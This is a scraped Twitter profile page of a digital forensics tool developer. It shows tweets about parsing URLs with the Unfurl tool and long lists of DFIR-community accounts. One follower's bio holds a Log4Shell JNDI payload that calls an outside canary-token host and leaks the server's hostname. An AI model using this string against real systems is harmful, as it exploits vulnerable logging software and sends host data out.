Ryan Benson @_RyanBenson
I do digital forensics and work on open source DFIR tools @Google. I kinda like web browsers, too. Not on Twitter often anymore, reach me at ryan 'at' https://t.co/Zcq6BJG4xC dfir.blog SF Bay Area Joined April 2009-
Tweets1K
-
Followers4K
-
Following267
-
Likes852
Ryan Benson retweeted
@GergelyOrosz FYI that link in the screenshot is acquired by the user tapping "Copy Link" button from the Twitter app on iPhone. That's what the parameter "s=46" means. It's safe to also drop that from the final URL. Here's where I got the s-parameter table to look up: dfir.blog/unfurl-parsing…
0
1
6
0
7
With all the uncertainty @twitter, I've seen more people talking about alternatives like #Mastodon. Like tweets, Mastodon IDs have embedded timestamps in them, and Unfurl can parse them: 🔗dfir.blog/unfurl/?url=ht… #DFIR #OSINT
Ryan Benson retweeted
We are reviewing our @MISPProject warning lists and we are looking for a maintained list of hosts which are domain parking. Do you know someone doing such thing? or should we start to build one from scratch? #threatintelligence
Ryan Benson retweeted
A key mindset to grasp as you transition from junior analyst to a more experienced level is that you won't have all the answers, but you can ask the right questions and know where to start looking for the answers.
Nice little tidbit here about decoding #LinkedIn profile ids from URLs, then using their sequential nature to estimate profile creation time. I see an @unfurl_link update in the future! #DFIR #OSINT
Nice little tidbit here about decoding #LinkedIn profile ids from URLs, then using their sequential nature to estimate profile creation time. I see an @unfurl_link update in the future! #DFIR #OSINT
Apparently TikTok uses the same ID scheme for job postings as it does for videos? Random, but kind of interesting.🤷♂️ Example: dfir.blog/unfurl/?url=ht… More info on TikTok timestamps: dfir.blog/tinkering-with… #DFIR #TikTok #OSINT
Ryan Benson retweeted
Have a long URL to decode? Use dfir.blog/unfurl/. It decodes parameters & values in the URL. Ex: I used Amazon & ran a search, copied URL, pasted into Unfurl. It broke the URL down & revealed "qid" param (2) is a time stamp and a date (3). #osint #cyber #tools
If you want a refresher on the benefits of allowlisting vs denylisting, just ask a 5 year old to stop doing something.
Hey, thanks! Your #DailyOSINT looks really interesting too!
Hey, thanks! Your #DailyOSINT looks really interesting too!
Ryan Benson retweeted
debugging strategy: write a message asking for help
IP address in the URL? Sure, why not. You never know what you'll find in a URL (until you look 👀). 🔗dfir.blog/unfurl/?url=ht… #DFIR #OSINT
Ryan Benson retweeted
If you need to pull out all the data in complicated URLs, Try the excellent Unfurl tool to extract and visualize each bit in the URLs. dfir.blog/unfurl/ github.com/obsidianforens… @_RyanBenson #OSINT #DFIR #BlueTeam #ThreatIntel #intelligence #ThreatHunting #infosec
Wooo! Thanks!
On browser forensics in #DFIR: In news.sophos.com/en-us/2022/04/…, just from the URL we can see the attackers installed Chrome the week of 2021-11-01. So much interesting stuff in URLs! Unfurl 🔗: dfir.blog/unfurl/?url=hX… h/t @phillmoore for the article and lots of nice Google research
Ryan Benson retweeted
<Thread> Today on the way to school, I accidentally deep-dived on threat modeling, attacker math, risk acceptance, password management, and ethics with my kids (6 and 4 years old). 6YO started with a simple question: how do we prevent our car from getting stolen? 1/x
Ryan Benson retweeted
For analysts, a few questions related to web browser-forensics... First, how often do you reach for web browser-related forensic evidence in the investigations you work?
Ryan Benson retweeted
Hi #OSINTSummit folks! 👋 Unfurl is a free, open source tool that you can use to "expand" complicated URLs and find interesting things inside them, like: 🕓 timestamps 🗜️ compressed strings 🔎 search params 🔀 shortlinks Check it out at unfurl.link! #DFIR #OSINT
Florian Roth ⚡️ @cyb3rops
207K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
4n6lady @4n6lady
62K Followers 669 Following #DFIR & #BlueTeam | IR & Threat Detection | #OSINT enthusiast | waiting for HL3 | AWS CIRT - my views are my own
Chris Sanders 🔎 �... @chrissanders88
34K Followers 489 Following Ed.D. | Founder @networkdefense @RuralTechFund | Former @Mandiant, DoD | Author: Intrusion Detection Honeypots, Practical Packet Analysis, Applied NSM
Stephan Berger @malmoeb
28K Followers 1K Following Head of Investigations @InfoGuardAG https://t.co/A5lnFAu7eX
Katie Nickels @likethecoins
55K Followers 3K Following Director of Intel at @redcanary. SANS Certified Instructor for FOR578: CTI. Senior Fellow at @CyberStatecraft. She/her. Mastodon: @[email protected]
Heather Mahalik Barnh... @HeatherMahalik
23K Followers 1K Following DFIR @cellebrite, Faculty Fellow & author @sansforensics #FOR585 #FOR500, wife, mama, researcher, USAF. Trust but validate. Thoughts are mine.
Chad Tilbury @chadtilbury
22K Followers 600 Following Digital forensics and incident response. Ex-AFOSI, Mandiant, and CrowdStrike. SANS Institute Fellow and co-author of #FOR500 and #FOR508 courses.
gabsmashh @gabsmashh
108K Followers 3K Following security strategist | 2L JD Candidate | NYU alum | UMGC adjunct professor | USMC & USCG auxiliarist
Justin Elze @HackingLZ
65K Followers 5K Following CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race cars
Kevin 🤖🕵️🍺 @KevinPagano3
3K Followers 573 Following 🕵🏼♂️ @stark4n6 🎴 Shiny cardboard collector 🍺 Resident beer drinker
Eric Capuano - Bsky: ... @eric_capuano
11K Followers 3K Following Co-Founder @recon_infosec | SANS DFIR Instructor | IANS Faculty | https://t.co/yUXCSu2Yso | ⬡ ❤ @shortxstack
Phill Moore @phillmoore
9K Followers 3K Following This Week in 4n6 // ThinkDFIR // SANS // CyberCX (DFIR) https://t.co/vLyL2sxTuy I might not know much, but I do know how to Google Tweets are mine
Nicole Beckwith @NicoleBeckwith
42K Followers 7K Following Director, Security Operations @kroger 🍓 Intel, Hunting, IR, Detection Engineering, Insider Risk, Fraud & Forensics 💻 Fmr LE & DFIR for OH & Secret Service TF.
DFIR Diva @DfirDiva
22K Followers 5K Following DFIR Analyst trying to learn all the things | DFIR Blog for Beginners | Founder @GetYourStart | https://t.co/7cHco4FjUS
Samir @SBousseaden
25K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]
Ryan "Chaps" Chapman @rj_chap
8K Followers 3K Following DFIR & malware analyst. @sansforensics FOR528 Author & FOR610 Instructor. @CactusCon crew. Husband & father. Comments = own.
Nasreddine Benchercha... @nas_bench
11K Followers 1K Following Detection @Splunk & @cisco | previously @nextronsystems | @sigma_hq & @magicswordio maintainer | Eternal Learner
DFIR Training @DFIRTraining
17K Followers 443 Following The official DFIR Training account and most complete #DFIR online resource. Managed by @Brett_Shavers.
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
Lorsek @Lorsek915
53 Followers 3K Following
EsmS @esms29
2 Followers 56 Following
Joshua Punkhead @Toranzamu20000
0 Followers 12 Following ✦Sweet JP ✦ Redline 8 Champion Always behind the wheel of the infamous Trans Am. Racing for freedom. Living for love. Thriving on the thrill
Captain Pug @PugCaptain
1 Followers 7 Following
anmol @anmolescape
83 Followers 3K Following the dao is a path of desolation. ai x code x marketing.
FarKingdom @FarKingdom97017
2 Followers 133 Following
L², PhD @L_Lgde
676 Followers 3K Following DFIR, Malware & CTI. Head of a CSIRT. Ex @ANSSI_FR. PhD in intl law. Mostly working on Chinese #APT but also on russian and cybercrime actors #CTI #Malware
tmechen @tmechen_
167 Followers 333 Following 👨🏼💻 | he/him | #IFG-Ultra | macht (noch) nicht was mit Holz
Oto içerik @xxxxxxxsoru
0 Followers 2 Following Burda paylaşılan içerikler otomatik olarak çekilmektedir.
Katana @Katana405
0 Followers 10 Following
Mirror Mirror @Mirror11Mirror1
0 Followers 350 Following
RyanDFIR @RyanDFIR
0 Followers 1 Following
ORTISTE @OrtIstee
41 Followers 711 Following
Oséas Freitas Rosa @rfsaeso
0 Followers 30 Following
sf-shane @sfshane1
2 Followers 46 Following
Hiperion @Hiperio71312600
30 Followers 983 Following
Rishabh @RishabhIndia18
102 Followers 1K Following #YOUNG #ACTIVE #STAND AGAINST CORRUPTION #VOICE OF POOR NEEDY PEOPLE.. ✌🏻#BORN FOR MY COUNTRY #DIE FOR MY COUNTRY.. 🇮🇳
Investigators @CornerstoneORPI
291 Followers 1K Following When its all about the information, verification is ALL. Since 2014. #PrivateInvestigator #OSINT #SOCMINT #DesktopInvestigation https://t.co/MsqEKMaFiA
Bittu_Vamshi_ @BittuVamshi1
72 Followers 1K Following
M Yep @myepe90
0 Followers 113 Following
OSINTech @OSINTech_
278 Followers 1K Following Sociopathic cat lover. Investigative Journalism, OSINT activities & Investigations
IDeepSearch @IDeepSearch
717 Followers 600 Following #IDeepSearch concept. #SOCMINT #OSINT #HUMINT information gathering, consulting, training. #PublicSourcesIntelligence #BackgroundChecks #EmploymentScreening
Stickman76 @Stickman00076
15 Followers 458 Following
Royal Arch Seeker @RA_Companion
501 Followers 2K Following Constantly Learning 👨💻 - "Libertarian 🐍 & Anti-Natalist 🚼"
JD Keeling @JDKeelingIII
84 Followers 946 Following
romcom @RomComOG
0 Followers 50 Following
Tursse @TursseJN6
29 Followers 861 Following
Manidip @Manidipofficial
98 Followers 639 Following Advance Schema Coder. Semantically interlinked Schema that actually moves the needle on the SERP. Get ready to stand out from the rest. DM me NOW!
Shina Mashiro @ShiinaaM
398 Followers 3K Following Microsoft Sentinel Enthusiast | 4n6 Investigator | Cloud Security | 🇮🇩 S.Kom
0xW43L @GhnimiWael
686 Followers 4K Following CTI Researcher | SRT Member @synack | X-Red-Teamer | X-Blue-Teamer | Bug Bounty Hunter | OSEP | eWAPTx | arcX ... Hunt threats, secure systems, learn always.
Harry Stein @mrharrystein
18 Followers 62 Following I love Jesus and my family. I enjoy my work as a DIFR investigator, network/performance expert, and experience in operating systems and software development.
Andy Morales @Andy2002a
60 Followers 276 Following
Lalit Kanyal @lalitkanyal23
7 Followers 219 Following
cr0@Defensive-Securit... @cr0nym
3K Followers 2K Following Focus on Linux/Kubernetes Attack/Detection/Forensics/Incident Response/Threat Hunting/Active Defense. Learning hard every single day.
Damien (andell) @AndellDam
954 Followers 273 Following Student korean & Japanese language. Google's Bug Hunter 🐛 Python Developer. Co-founder @1492_vision (Google Discover) 😍 Korea & Japan
Glenn @glennf88
29 Followers 81 Following
Zipferd Red Dirt Rock... @SlartBfast
1K Followers 7K Following RIP Charlie Kirk | Working hard for a better tomorrow | Liberty Loophole Labs | TRUMP-O-Vision | Motorcycles | Cigars | Replace for with fir!
J @zzzboomz
23 Followers 215 Following
Etiniabasi-Cyber3TY @cyber3ty
68 Followers 530 Following Digital Forensics and Incidence Response | Entry Level | Cybersecurity Analyst | Threat Intelligence
Eng.Ali Saad @EngAbuSaadCE
168 Followers 1K Following computer engineering Interested in DFIR and cyber security
Noor @noor_bhatnagar
103 Followers 213 Following
4n6lady @4n6lady
62K Followers 669 Following #DFIR & #BlueTeam | IR & Threat Detection | #OSINT enthusiast | waiting for HL3 | AWS CIRT - my views are my own
Chris Sanders 🔎 �... @chrissanders88
34K Followers 489 Following Ed.D. | Founder @networkdefense @RuralTechFund | Former @Mandiant, DoD | Author: Intrusion Detection Honeypots, Practical Packet Analysis, Applied NSM
Heather Mahalik Barnh... @HeatherMahalik
23K Followers 1K Following DFIR @cellebrite, Faculty Fellow & author @sansforensics #FOR585 #FOR500, wife, mama, researcher, USAF. Trust but validate. Thoughts are mine.
Chad Tilbury @chadtilbury
22K Followers 600 Following Digital forensics and incident response. Ex-AFOSI, Mandiant, and CrowdStrike. SANS Institute Fellow and co-author of #FOR500 and #FOR508 courses.
The DFIR Report @TheDFIRReport
62K Followers 0 Following Real Intrusions by Real Attackers, the Truth Behind the Intrusion. Services: https://t.co/XW613EKt2w
Kevin 🤖🕵️🍺 @KevinPagano3
3K Followers 573 Following 🕵🏼♂️ @stark4n6 🎴 Shiny cardboard collector 🍺 Resident beer drinker
Phill Moore @phillmoore
9K Followers 3K Following This Week in 4n6 // ThinkDFIR // SANS // CyberCX (DFIR) https://t.co/vLyL2sxTuy I might not know much, but I do know how to Google Tweets are mine
Samir @SBousseaden
25K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]
DFIR Training @DFIRTraining
17K Followers 443 Following The official DFIR Training account and most complete #DFIR online resource. Managed by @Brett_Shavers.
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
Steve YARA Synapse Mi... @stvemillertime
17K Followers 1K Following threat intelligence @google writing & sharing on adversary tradecraft, malware, threat detection, AI-nexus intel and all things #yara
Kathryn Hedley @4enzikat0r
3K Followers 800 Following #DFIR & #DFIRFit geek, SANS Author/Instructor #FOR308, Instructor #FOR500. All opinions mine.
Matt Linton @0xMatt
7K Followers 772 Following #DFIR with a lot of focus on the IR part. Cellist, NASA Alum, Parrot lover, USAR & EMS do-er. BlueSky is @amuse.bsky.social
Susie Dent @susie_dent
1.0M Followers 825 Following That woman in Dictionary Corner. @susiedent.bsky.social
Battle Programmer Yuu @netspooky
20K Followers 1K Following knuck if you buck 日本語/español OK (he/they) @tmpout @binarygolf @[email protected] (fedi) @ https://t.co/mZ77OENytt (bsky)
ArcPoint Forensics @Contact_APF
428 Followers 22 Following Learn more about ArcPoint Forensic @ https://t.co/3AN6LcEnyf. And don't forget to sign up for updates on our website to stay up to date with the latest news.
Ed Michael @EdXlg123
689 Followers 634 Following DF/IR Director at Unit 42. Retired LEO, IACIS Incident Forensic Response Trainer, World of Warcraft gamer, and lifter of things
White Hat Inspector @WHInspector
12K Followers 195 Following #OSINT, Geolocation, Cyber Security | #DailyOSINT | Support: https://t.co/bk2qdJDuxd | TraceLabs CTF Black Badge | https://t.co/i6jwJugpSj
Andrea Fortuna @andreafortunatw
767 Followers 866 Following "I don't know half of you half as well as I should like; and I like less than half of you half as well as you deserve." #cybersecurity #dfir #music #programming
msticpy @msticpy
850 Followers 21 Following #msticpy is an open source library for InfoSec investigation and hunting in #Jupyter Notebooks and #Python.
Sarah Yoder @sarah__yoder
2K Followers 361 Following Incident Response @Mandiant. Former MITRE ATT&CKer.
DFIRDetective @DFIRDetective
1K Followers 758 Following Cassie | Summit/Conference Link Collector | Tech Enthusiast | #GCFE #GCTI #DFIR #OSINT | #LEO to #Cyber
SecuriTeeStar @SecuriTeeStar
463 Followers 462 Following FITS TO FLATTER ALL | Just Say No to the Unisex Tee | Hacker/InfoSec Apparel | Support the movement https://t.co/7Apr4GoKiO
Duane @duanehoward
182 Followers 343 Following Security Engineer, D&R @Google. Excelling at mediocrity, I run, make beer and then drink it. 🍻 Opinions are my own. pcap or it didn't happen.
Sergio Caltagirone - ... @cnoanalysis
16K Followers 1K Following President @AcademyThreat & Tech Director @GblEmancipation; Fmr @Dragosinc, @Microsoft & @NSAGov He/Him NOW AT https://t.co/ZWCsxBUFeG
Philippe Lagadec @decalage2
5K Followers 1K Following Author of oletools, olefile, ViperMonkey, ExeFilter, Balbuzard. #DFIR, #malware analysis, maldocs, file formats, #Python. @[email protected]
Josh Lemon @joshlemon
2K Followers 1K Following Chief DIFR at @SoteriaSec_io | @SANSInstitute Principal Instructor & Author | Digital Forensics & Incident Response geek
unfurl🌿 @unfurl_link
56 Followers 2 Following Explore URLs using a building block approach to understand all they contain. #opensource #Python #DFIR #OSINT
Chris xorrior@infosec... @xorrior
11K Followers 1K Following @[email protected] Husband | Father | Pentester | Red Teamer | macOS security | Manager - Red Team @Zoom https://t.co/af3c0fgU2v
Brian Maloney @bmmaloney97
2K Followers 611 Following "Distrust and caution are the parents of security." - Benjamin Franklin
Kevin Holvoet @digihash
2K Followers 855 Following Cyber Threat Research Lead @CCB_Belgium/@CCBalert | #FOR578: #CTI @SANSInstitute instructor | @CuratedIntel | loves to try new things: food, beer whisky, etc.
⚛️ Marcin Siedlar... @siedlmar
2K Followers 1K Following Technical attribution of cyber threats | Frontline Intrusion Intelligence 🦅 @Mandiant
theincidentalchewtoy @4n6chewtoy
171 Followers 22 Following Forensics – One Byte at a Time He used to byte, now its just a nibble🐕
Catalin Cimpanu @campuscodi
107K Followers 2K Following Parked account. I don't usually post here on a regular basis. Cybersecurity reporter. Check me out on BlueSky and Mastodon.
Alexandre Dulaunoy @a... @adulau
8K Followers 7K Following Enjoy when humans are using machines in unexpected ways. I break stuff and I do stuff. @[email protected]
The SEINT, PhD @SEINT_pl
4K Followers 376 Following SEINT - Social Engineering and INTelligence | #OSINT & #OPSEC trainer at @securitum_com | OSINT series author on https://t.co/1T5aJXFCGO | @[email protected]
Ryan Tomcik @heferyzan
1K Followers 2K Following DE/TH @GoogleCloud @Mandiant Threat Defense | Google in the streets, Mandiant in the tweets | Thruntito ergo sum | Bsky: https://t.co/THP7ny8CgD
Aaron Stephens @x04steve
3K Followers 523 Following
Jitters/Mudkip @umudkip
354 Followers 1K Following Infosec, good conversation, being an adorable Mudkip
Arman Gungor @armangungor
402 Followers 32 Following Digital forensics & software development. Contributes to @meridian & @MetaspikeHQ blogs. Tweets about #DFIR #InfoSec
Daniel Bardenstein @bardenstein
423 Followers 362 Following CTO, co-founder @ManifestCyber. Former @CISAGov, @DefenseDigital. Fellow @AspenPolicyHub. Leading @0x4Sight. Hack the Planet. Views are my own.
Will Harris @parityzero
4K Followers 803 Following Chrome Security gnome. I work on the sandbox and local data protection on Windows. @parityzero.99 on signal. Opinions here are my own!
DFIRScience @DFIRScience
4K Followers 2K Following 🕵️Digital forensics, incident response, and information security research, software, and tutorials.
Forensics Reformatted... @4n6reformatted
458 Followers 198 Following Forensics Reformatted is a Digital Forensics podcast by former Chewing the FAT hosts, Firmsky (Adam Firman) @firmsky & Cobbers (Phil Cobley) @cobbers_uk
DFIRderps @DFIRderps
68 Followers 39 Following DFIR derps, disasters and downright dirty encounters. DM me if you want to share your own DFIR derps anonymously or with credit.
Jonathan Greig @jonathan_greig
61 Followers 612 Following
Timesketch @TimesketchProj
631 Followers 0 Following Timesketch is an open-source tool for collaborative forensic timeline analysis. https://t.co/RDJ1gmHtWi
Shahar Ben-Hador @Sbenhador
65 Followers 135 Following Co-Founder @BlastRadius_AI. ex @Exabeam, @Imperva. Love solving hard problems practically. Opinions are my own.
Andy Greenberg (@agre... @a_greenberg
71K Followers 1K Following WIRED writer, author of SANDWORM and now TRACERS IN THE DARK: The Global Hunt for the Crime Lords of Cryptocurrency. Andy.01 on Signal. [email protected]
evandrix @evandrix
491 Followers 101 Following ${jndi:ldap://x${hostName}.L4J.mxr7harp21175loyvy9ezpx6s.canarytokens.com/a}
Trends for United States
13,7 B posts
368 B posts
15 B posts
13,4 B posts
5.675 posts
2.071 posts
442 B posts
9.342 posts
41,3 B posts
43,5 B posts
74,7 B posts
22,8 B posts
72,5 B posts
84,6 B posts
24,9 B posts
22,6 B posts
3.606 posts
You might like
Eric Zimmerman
@EricRZimmerman
19K Followers
Phill Moore
@phillmoore
9K Followers
Mari Degrazia
@maridegrazia
8K Followers
DFIR Training
@DFIRTraining
17K Followers
Sarah Edwards 👩�...
@iamevltwin
20K Followers
13Cubed
@13CubedDFIR
7K Followers
Heather Mahalik Barnh...
@HeatherMahalik
23K Followers
Rob T. Lee
@robtlee
26K Followers
DFRWS
@DFRWS
5K Followers
volatility
@volatility
22K Followers
Yogesh Khatri
@SwiftForensics
2K Followers
Andrew Rathbun
@bunsofwrath12
3K Followers
Kathryn Hedley
@4enzikat0r
3K Followers
X-Ways Forensics Prac...
@XWaysGuide
5K Followers
Jamie Levy🦉
@gleeda
10K Followers